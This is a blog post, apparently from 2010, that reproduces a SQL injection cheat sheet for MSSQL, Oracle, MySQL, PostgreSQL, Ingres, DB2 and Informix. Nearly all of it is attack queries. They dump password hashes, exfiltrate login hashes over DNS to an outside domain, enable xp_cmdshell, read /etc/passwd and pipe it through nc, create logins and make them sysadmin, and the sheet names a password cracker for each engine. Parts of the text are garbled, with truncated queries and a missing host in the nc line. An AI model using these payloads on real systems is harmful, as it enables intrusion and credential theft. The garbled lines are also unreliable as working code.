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hoja de injsql

domingo, 2 de mayo de 2010 | Tags: | 13 Comentarios


SELECT @@version
SELECT 1 — comment

SELECT /*comment*/1
Current User
SELECT user_name();

SELECT system_user;

SELECT user;

SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID
List Users
SELECT name FROM master..syslogins
List Password Hashes
SELECT name, password FROM master..sysxlogins — priv, mssql 2000;

name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins —
priv, mssql 2000. Need to convert to hex to return hashes in MSSQL
error message / some version of query analyzer.

SELECT name, password_hash FROM master.sys.sql_logins — priv, mssql 2005;

SELECT name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins — priv, mssql 2005
Password Cracker
MSSQL 2000 and 2005 Hashes are both SHA1-based.phrasen|drescher can crack these.
List Privileges
List DBA Accounts

is_srvrolemember(’sysadmin’); — is your account a sysadmin? returns 1
for true, 0 for false, NULL for invalid role. Also try ‘bulkadmin’,
’systemadmin’ and other values from the documentation

SELECT is_srvrolemember(’sysadmin’, ’sa’); — is sa a sysadmin? return 1 for true, 0 for false, NULL for invalid role/username.
Current Database
List Databases
SELECT name FROM master..sysdatabases;

SELECT DB_NAME(N); — for N = 0, 1, 2, …
List Columns
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’); — for the current DB only

master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM
master..syscolumns, master..sysobjects WHERE
master..syscolumns.id=master..sysobjects.id AND
master..sysobjects.name=’sometable’; — list colum names and types for
List Tables
SELECT name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for views

SELECT name FROM someotherdb..sysobjects WHERE xtype = ‘U’;

master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM
master..syscolumns, master..sysobjects WHERE
master..syscolumns.id=master..sysobjects.id AND
master..sysobjects.name=’sometable’; — list colum names and types for
Find Tables From Column Name
NB: This example works only for the current database. If you wan’t to
search another db, you need to specify the db name (e.g. replace
sysobject with mydb..sysobjects).

SELECT sysobjects.name
as tablename, syscolumns.name as columnname FROM sysobjects JOIN
syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype =
‘U’ AND syscolumns.name LIKE ‘%PASSWORD%’ — this lists table, column
for each column containing the word ‘password’
Select Nth Row
SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC — gets 9th row
Select Nth Char
SELECT substring(‘abcd’, 3, 1) — returns c
Bitwise AND
SELECT 6 & 2 — returns 2

SELECT 6 & 1 — returns 0
ASCII Value -> Char
SELECT char(0×41) — returns A
Char -> ASCII Value
SELECT ascii(‘A’) – returns 65
SELECT CAST(‘1′ as int);

SELECT CAST(1 as char)
String Concatenation
SELECT ‘A’ + ‘B’ – returns AB
If Statement
IF (1=1) SELECT 1 ELSE SELECT 2 — returns 1
Case Statement
SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END — returns 1
Avoiding Quotes
SELECT char(65)+char(66) — returns AB
Time Delay
WAITFOR DELAY ‘0:0:5′ — pause for 5 seconds
Make DNS Requests
@host varchar(800); select @host = name FROM master..syslogins;
exec(‘master..xp_getfiledetails ”\\’ + @host + ‘\c$\boot.ini”’); —
nonpriv, works on 2000

declare @host varchar(800); select
@host = name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) +
‘.2.pentestmonkey.net’ from sys.sql_logins; exec(‘xp_fileexist ”\\’ +
@host + ‘\c$\boot.ini”’); — priv, works on 2005

– NB: Concatenation is not allowed in calls to these SPs, hence why we have to use @host. Messy but necessary.

– Also check out theDNS tunnel feature of sqlninja
Command Execution
EXEC xp_cmdshell ‘net user’; — priv

On MSSQL 2005 you may need to reactivate xp_cmdshell first as it’s disabled by default:

EXEC sp_configure ’show advanced options’, 1; — priv


EXEC sp_configure ‘xp_cmdshell’, 1; — priv

Local File Access
CREATE TABLE mydata (line varchar(8000));

BULK INSERT mydata FROM ‘c:\boot.ini’;

DROP TABLE mydata;
Hostname, IP Address
Create Users
EXEC sp_addlogin ‘user’, ‘pass’; — priv
Drop Users
EXEC sp_droplogin ‘user’; — priv
Make User DBA
EXEC master.dbo.sp_addsrvrolemember ‘user’, ’sysadmin; — priv
Location of DB files
Default/System Databases






SELECT banner FROM v$version WHERE banner LIKE ‘Oracle%’;

SELECT banner FROM v$version WHERE banner LIKE ‘TNS%’;

SELECT version FROM v$instance;
SELECT 1 FROM dual — comment

NB: SELECT statements must have a FROM clause in Oracle so we have to
use the dummy table name ‘dual’ when we’re not actually selecting from
a table.
Current User
SELECT user FROM dual
List Users
SELECT username FROM all_users ORDER BY username;

SELECT name FROM sys.user$; — priv
List Password Hashes
SELECT name, password, astatus FROM sys.user$ — priv, <= 10g. astatus tells you if acct is locked

SELECT name,spare4 FROM sys.user$ — priv, 11g
Password Cracker
checkpwd will crack the DES-based hashes from Oracle 8, 9 and 10.
List Privileges
SELECT * FROM session_privs; — current privs

SELECT * FROM dba_sys_privs WHERE grantee = ‘DBSNMP’; — priv, list a user’s privs

SELECT grantee FROM dba_sys_privs WHERE privilege = ‘SELECT ANY DICTIONARY’; — priv, find users with a particular priv

List DBA Accounts
SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = ‘YES’; — priv, list DBAs, DBA roles
Current Database
SELECT global_name FROM global_name;

SELECT name FROM v$database;

SELECT instance_name FROM v$instance;

List Databases
SELECT DISTINCT owner FROM all_tables; — list schemas (one per user)

– Also query TNS listener for other databases. See tnscmd(services | status).
List Columns
SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’;

SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’ and owner = ‘foo’;
List Tables
SELECT table_name FROM all_tables;

SELECT owner, table_name FROM all_tables;
Find Tables From Column Name
SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE ‘%PASS%’; — NB: table names are upper case
Select Nth Row
username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY
username) WHERE r=9; — gets 9th row (rows numbered from 1)
Select Nth Char
SELECT substr(‘abcd’, 3, 1) FROM dual; — gets 3rd character, ‘c’
Bitwise AND
SELECT bitand(6,2) FROM dual; — returns 2

SELECT bitand(6,1) FROM dual; — returns0
ASCII Value -> Char
SELECT chr(65) FROM dual; — returns A
Char -> ASCII Value
SELECT ascii(‘A’) FROM dual; — returns 65
SELECT CAST(1 AS char) FROM dual;

SELECT CAST(‘1′ AS int) FROM dual;
String Concatenation
SELECT ‘A’ || ‘B’ FROM dual; — returns AB
If Statement
BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; — doesn’t play well with SELECT statements
Case Statement
SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; — returns 1

SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; — returns 2
Avoiding Quotes
SELECT chr(65) || chr(66) FROM dual; — returns AB
Time Delay
BEGIN DBMS_LOCK.SLEEP(5); END; — priv, can’t seem to embed this in a SELECT

SELECT UTL_INADDR.get_host_name(‘′) FROM dual; — if reverse looks are slow

SELECT UTL_INADDR.get_host_address(‘blah.attacker.com’) FROM dual; — if forward lookups are slow

SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual; — if outbound TCP is filtered / slow

– Also see Heavy Queries to create a time delay
Make DNS Requests
SELECT UTL_INADDR.get_host_address(‘google.com’) FROM dual;

SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual;
Command Execution
Java can be used to execute commands if it’s installed.

ExtProc can sometimes be used too, though it normally failed for me. :-(
Local File Access
UTL_FILE can sometimes be used. Check that the following is non-null:

SELECT value FROM v$parameter2 WHERE name = ‘utl_file_dir’;

Java can be used to read and write files if it’s installed (it is not available in Oracle Express).
Hostname, IP Address
SELECT UTL_INADDR.get_host_name FROM dual;

SELECT host_name FROM v$instance;

SELECT UTL_INADDR.get_host_address FROM dual; — gets IP address

SELECT UTL_INADDR.get_host_name(‘′) FROM dual; — gets hostnames
Location of DB files
Default/System Databases



SELECT @@version
SELECT 1; #comment

SELECT /*comment*/1;
Current User
SELECT user();

SELECT system_user();
List Users
SELECT user FROM mysql.user; — priv
List Password Hashes
SELECT host, user, password FROM mysql.user; — priv
Password Cracker
John the Ripper will crack MySQL password hashes.
List Privileges
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; — list user privs

host, user, Select_priv, Insert_priv, Update_priv, Delete_priv,
Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv,
File_priv, Grant_priv, References_priv, Index_priv, Alter_priv,
Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv,
Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; —
priv, list user privs

SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; — list privs on databases (schemas)

SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; — list privs on columns
List DBA Accounts
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘SUPER’;

SELECT host, user FROM mysql.user WHERE Super_priv = ‘Y’; # priv
Current Database
SELECT database()
List Databases
SELECT schema_name FROM information_schema.schemata; — for MySQL >= v5.0

SELECT distinct(db) FROM mysql.db — priv
List Columns
table_schema, table_name, column_name FROM information_schema.columns
WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
List Tables
table_schema,table_name FROM information_schema.tables WHERE
table_schema != ‘mysql’ AND table_schema != ‘information_schema’
Find Tables From Column Name
table_schema, table_name FROM information_schema.columns WHERE
column_name = ‘username’; — find table which have a column called
Select Nth Row
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0

SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0
Select Nth Char
SELECT substr(‘abcd’, 3, 1); # returns c
Bitwise AND
SELECT 6 & 2; # returns 2

SELECT 6 & 1; # returns 0
ASCII Value -> Char
SELECT char(65); # returns A
Char -> ASCII Value
SELECT ascii(‘A’); # returns 65
SELECT cast(‘1′ AS unsigned integer);

SELECT cast(‘123′ AS char);
String Concatenation
SELECT CONCAT(‘A’,'B’); #returns AB

SELECT CONCAT(‘A’,'B’,'C’); # returns ABC
If Statement
SELECT if(1=1,’foo’,'bar’); — returns ‘foo’
Case Statement
SELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; # returns A
Avoiding Quotes
SELECT 0×414243; # returns ABC
Time Delay

SELECT SLEEP(5); # >= 5.0.12
Make DNS Requests
Command Execution
mysqld (<5.0) is running as root AND you compromise a DBA account
you can execute OS commands by uploading a shared object file into
/usr/lib (or similar). The .so file should contain a User Defined
Function (UDF). raptor_udf.c
explains exactly how you go about this. Remember to compile for the
target architecture which may or may not be the same as your attack
Local File Access
…’ UNION ALL SELECT LOAD_FILE(‘/etc/passwd’) — priv, can only read world-readable files.

SELECT * FROM mytable INTO dumpfile ‘/tmp/somefile’; — priv, write to file system
Hostname, IP Address
Create Users
CREATE USER test1 IDENTIFIED BY ‘pass1′; — priv
Delete Users
DROP USER test1; — priv
Make User DBA
GRANT ALL PRIVILEGES ON *.* TO test1@’%'; — priv
Location of DB files
SELECT @@datadir;
Default/System Databases
information_schema (>= mysql 5.0)



SELECT version()
SELECT 1; –comment

SELECT /*comment*/1;
Current User
SELECT user;

SELECT current_user;

SELECT session_user;

SELECT usename FROM pg_user;

SELECT getpgusername();
List Users
SELECT usename FROM pg_user
List Password Hashes
SELECT usename, passwd FROM pg_shadow — priv
Password Cracker
MDCrack can crack PostgreSQL’s MD5-based passwords.
List Privileges
SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user
List DBA Accounts
SELECT usename FROM pg_user WHERE usesuper IS TRUE
Current Database
SELECT current_database()
List Databases
SELECT datname FROM pg_database
List Columns
relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A,
pg_type T WHERE (C.relkind=’r') AND (N.oid=C.relnamespace) AND
(A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT
A.attisdropped) AND (N.nspname ILIKE ‘public’)
List Tables
c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace
n ON n.oid = c.relnamespace WHERE c.relkind IN (‘r’,”) AND n.nspname
NOT IN (‘pg_catalog’, ‘pg_toast’) AND
Find Tables From Column Name
If you want to list all the table names that contain a column LIKE ‘%password%’:

DISTINCT relname FROM pg_class C, pg_namespace N, pg_attribute A,
pg_type T WHERE (C.relkind=’r') AND (N.oid=C.relnamespace) AND
(A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT
A.attisdropped) AND (N.nspname ILIKE ‘public’) AND attname LIKE
Select Nth Row
SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 0; — rows numbered from 0

SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 1;
Select Nth Char
SELECT substr(‘abcd’, 3, 1); — returns c
Bitwise AND
SELECT 6 & 2; — returns 2

SELECT 6 & 1; –returns 0
ASCII Value -> Char
SELECT chr(65);
Char -> ASCII Value
SELECT ascii(‘A’);
SELECT CAST(1 as varchar);

SELECT CAST(‘1′ as int);
String Concatenation
SELECT ‘A’ || ‘B’; — returnsAB
If Statement
IF statements only seem valid inside functions, so aren’t much use for SQL injection. See CASE statement instead.
Case Statement
SELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; — returns A
Avoiding Quotes
SELECT CHR(65)||CHR(66); — returns AB
Time Delay
SELECT pg_sleep(10); — postgres 8.2+ only

OR REPLACE FUNCTION sleep(int) RETURNS int AS ‘/lib/libc.so.6′, ’sleep’
language ‘C’ STRICT; SELECT sleep(10); –priv, create your own sleep
function. Taken from here .
Make DNS Requests
Generally not possible in postgres. However ifcontrib/dblink is installed (it isn’t by default) it can be used to resolve hostnames (assuming you have DBA rights):

SELECT * FROM dblink(‘host=put.your.hostname.here user=someuser dbname=somedb’, ‘SELECT version()’) RETURNS (result TEXT);

if you have DBA rights you could run an OS-level command (see below) to
resolve hostnames, e.g. “ping pentestmonkey.net”.
Command Execution
CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS ‘/lib/libc.so.6′, ’system’ LANGUAGE ‘C’ STRICT; — priv

SELECT system(‘cat /etc/passwd | nc 8080′); — priv, commands run as postgres/pgsql OS-level user
Local File Access
CREATE TABLE mydata(t text);

COPY mydata FROM ‘/etc/passwd’; — priv, can read files which are readable by postgres OS-level user

…’ UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 1; — get data back one row at a time

…’ UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 2; — get data back one row at a time …

DROP TABLE mytest mytest;

Write to a file:

CREATE TABLE mytable (mycol text);

INSERT INTO mytable(mycol) VALUES (”);

mytable (mycol) TO ‘/tmp/test.php’; –priv, write files as postgres
OS-level user. Generally you won’t be able to write to the web root,
but it’s always work a try.

– priv user can also read/write files by mapping libc functions
Hostname, IP Address
SELECT inet_server_addr(); — returns db server IP address (or null if using local connection)

SELECT inet_server_port(); — returns db server IP address (or null if using local connection)
Create Users
CREATE USER test1 PASSWORD ‘pass1′; — priv

CREATE USER test1 PASSWORD ‘pass1′ CREATEUSER; — priv, grant some privs at the same time
Drop Users
DROP USER test1; — priv
Make User DBA
Location of DB files
SELECT current_setting(‘data_directory’); — priv

SELECT current_setting(‘hba_file’); — priv
Default/System Databases



select dbmsinfo(‘_version’);
SELECT 123; — comment

select 123; /* comment */
Current User
select dbmsinfo(’session_user’);

select dbmsinfo(’system_user’);
List Users
First connect to iidbdb, then:

select name, password from iiuser;
Create Users
create user testuser with password = ‘testuser’;– priv
List Password Hashes
First connect to iidbdb, then:

select name, password from iiuser;
List Privileges
select dbmsinfo(‘db_admin’);

select dbmsinfo(‘create_table’);

select dbmsinfo(‘create_procedure’);

select dbmsinfo(’security_priv’);

select dbmsinfo(’select_syscat’);

select dbmsinfo(‘db_privileges’);

select dbmsinfo(‘current_priv_mask’);
List DBA Accounts
Current Database
select dbmsinfo(‘database’);
List Databases
List Columns
select column_name, column_datatype, table_name, table_owner from iicolumns;
List Tables
select table_name, table_owner from iitables;

select relid, relowner, relloc from iirelation;

select relid, relowner, relloc from iirelation where relowner != ‘$ingres’;
Find Tables From Column Name
Select Nth Row
Astoundingly, this doesn’t seem to be possible! This is as close as you can get:

select top 10 blah from table;

select first 10 blah form table;
Select Nth Char
select substr(‘abc’, 2, 1); — returns ‘b’
Bitwise AND
The function “bit_and” exists, but seems hard to use. Here’s an

example of ANDing 3 and 5 together. The result is a “byte” type

with value \001:

select substr(bit_and(cast(3 as byte), cast(5 as byte)),1,1);
ASCII Value -> Char
Char -> ASCII Value

(The “ascii” function exists, but doesn’t seem to do what I’d expect.)
select cast(123 as varchar);

select cast(‘123′ as integer);
String Concatenation
select ‘abc’ || ‘def’;
If Statement
Case Statement
Avoiding Quotes
Time Delay

See Heavy Queries article for some ideas.
Make DNS Requests
Command Execution
Local File Access
Hostname, IP Address
Location of DB files
Default/System Databases
Installing Locally
The Ingres database can be downloaded for free fromhttp://esd.ingres.com/

A pre-built Linux-based Ingres Database Server can be download fromhttp://www.vmware.com/appliances/directory/832
Database Client

There is a client called “sql” which can be used for local connections (at least) in the database server package above.
Logging in from command line
$ su – ingres

$ sql iidbdb

* select dbmsinfo(‘_version’); \go
Identifying on the network


select versionnumber, version_timestamp from sysibm.sysversions;
select blah from foo; — comment like this
Current User
select user from sysibm.sysdummy1;

select session_user from sysibm.sysdummy1;

select system_user from sysibm.sysdummy1;
List Users
N/A (I think DB2 uses OS-level user accounts for authentication.)

Database authorities (like roles, I think) can be listed like this:

select grantee from syscat.dbauth;
List Password Hashes
N/A (I think DB2 uses OS-level user accounts for authentication.)
List Privileges
select * from syscat.tabauth; — privs on tables

select * from syscat.dbauth where grantee = current user;

select * from syscat.tabauth where grantee = current user;
List DBA Accounts
Current Database
select current server from sysibm.sysdummy1;
List Databases
SELECT schemaname FROM syscat.schemata;
List Columns
select name, tbname, coltype from sysibm.syscolumns;
List Tables
select name from sysibm.systables;
Find Tables From Column Name
Select Nth Row
select name from (SELECT name FROM sysibm.systables order by

name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;
Select Nth Char
SELECT SUBSTR(‘abc’,2,1) FROM sysibm.sysdummy1; — returns b
Bitwise AND
This page seems to indicate that DB2 has no support for bitwise operators!
ASCII Value -> Char
select chr(65) from sysibm.sysdummy1; — returns ‘A’
Char -> ASCII Value
select ascii(‘A’) from sysibm.sysdummy1; — returns 65
SELECT cast(‘123′ as integer) FROM sysibm.sysdummy1;

SELECT cast(1 as char) FROM sysibm.sysdummy1;
String Concatenation
SELECT ‘a’ concat ‘b’ concat ‘c’ FROM sysibm.sysdummy1; — returns ‘abc’

select ‘a’ || ‘b’ from sysibm.sysdummy1; — returns ‘ab’
If Statement
Case Statement
Avoiding Quotes
Time Delay
???See Heavy Queries article for some ideas.
Make DNS Requests
Command Execution
Local File Access
Hostname, IP Address
Location of DB files
Default/System Databases


SELECT DBINFO(‘version’, ‘full’) FROM systables WHERE tabid = 1;

SELECT DBINFO(‘version’, ’server-type’) FROM systables WHERE tabid = 1;

SELECT DBINFO(‘version’, ‘major’), DBINFO(‘version’, ‘minor’), DBINFO(‘version’, ‘level’) FROM systables WHERE tabid = 1;

DBINFO(‘version’, ‘os’) FROM systables WHERE tabid = 1; — T=Windows,
U=32 bit app on 32-bit Unix, H=32-bit app running on 64-bit Unix,
F=64-bit app running on 64-bit unix
select 1 FROM systables WHERE tabid = 1; — comment
Current User
SELECT USER FROM systables WHERE tabid = 1;

select CURRENT_ROLE FROM systables WHERE tabid = 1;
List Users
select username, usertype, password from sysusers;
List Password Hashes
List Privileges
tabname, grantor, grantee, tabauth FROM systabauth join systables on
systables.tabid = systabauth.tabid; — which tables are accessible by
which users

select procname, owner, grantor, grantee
from sysprocauth join sysprocedures on sysprocauth.procid =
sysprocedures.procid; — which procedures are accessible by which users
List DBA Accounts
Current Database
SELECT DBSERVERNAME FROM systables where tabid = 1; — server name
List Databases
select name, owner from sysdatabases;
List Columns
select tabname, colname, owner, coltype FROM syscolumns join systables on syscolumns.tabid = systables.tabid;
List Tables
select tabname, owner FROM systables;

select tabname, viewtext FROM sysviews join systables on systables.tabid = sysviews.tabid;
List Stored Procedures
select procname, owner FROM sysprocedures;
Find Tables From Column Name
tabname, colname, owner, coltype FROM syscolumns join systables on
syscolumns.tabid = systables.tabid where colname like ‘%pass%’;
Select Nth Row
first 1 tabid from (select first 10 tabid from systables order by
tabid) as sq order by tabid desc; — selects the 10th row
Select Nth Char
SELECT SUBSTRING(‘ABCD’ FROM 3 FOR 1) FROM systables where tabid = 1; — returns ‘C’
Bitwise AND
select bitand(6, 1) from systables where tabid = 1; — returns 0

select bitand(6, 2) from systables where tabid = 1; — returns 2
ASCII Value -> Char
Char -> ASCII Value
select ascii(‘A’) from systables where tabid = 1;
select cast(‘123′ as integer) from systables where tabid = 1;

select cast(1 as char) from systables where tabid = 1;
String Concatenation
SELECT ‘A’ || ‘B’ FROM systables where tabid = 1; — returns ‘AB’

SELECT concat(‘A’, ‘B’) FROM systables where tabid = 1; — returns ‘AB’
String Length
SELECT tabname, length(tabname), char_length(tabname), octet_length(tabname) from systables;
If Statement
Case Statement
select tabid, case when tabid>10 then “High” else ‘Low’ end from systables;
Avoiding Quotes
Time Delay
Make DNS Requests
Command Execution
Local File Access
Hostname, IP Address
SELECT DBINFO(‘dbhostname’) FROM systables WHERE tabid = 1; — hostname
Location of DB files
Default/System Databases
These are the system databases:





* = don’t seem to contain anything / don’t allow reading
Installing Locally
You can download Informix Dynamic Server Express Edition 11.5 Trial for Linux and Windows.
Database Client
There’s a database client SDK available, but I couldn’t get the demo client working.

I used SQuirreL SQL Client Version 2.6.8 after installing the Informix JDBC drivers (“emerge dev-java/jdbc-informix” on Gentoo).
Logging in from command line
If you get local admin rights on a Windows box and have a GUI logon:

  • Click:
    Start | All Programs | IBM Informix Dynamic Server 11.50 |
    someservername. This will give you a command prompt with various
    Environment variables set properly.
  • Run dbaccess.exe from your command prompt. This will bring up a text-based GUI that allows you to browse databases.

following were set on my test system. This may help if you get command
line access, but can’t get a GUI – you’ll need to change


set INFORMIXSERVER=testservername

set ONCONFIG=ONCONFIG.testservername

Files\ibm\gsk7\bin;C:\Program Files\ibm\gsk7\lib


set DBTEMP=C:\PROGRA~1\IBM\IBMINF~1\11.50\infxtmp


set DB_LOCALE=EN_US.8859-1



mode con codepage select=1252
Identifying on the network
default installation listened on two TCP ports: 9088 and 9099. When I
created a new “server name”, this listened on 1526/TCP by default. Nmap
4.76 didn’t identify these ports as Informix:

$ sudo nmap -sS -sV -p- -v –version-all

1526/tcp open pdap-np?

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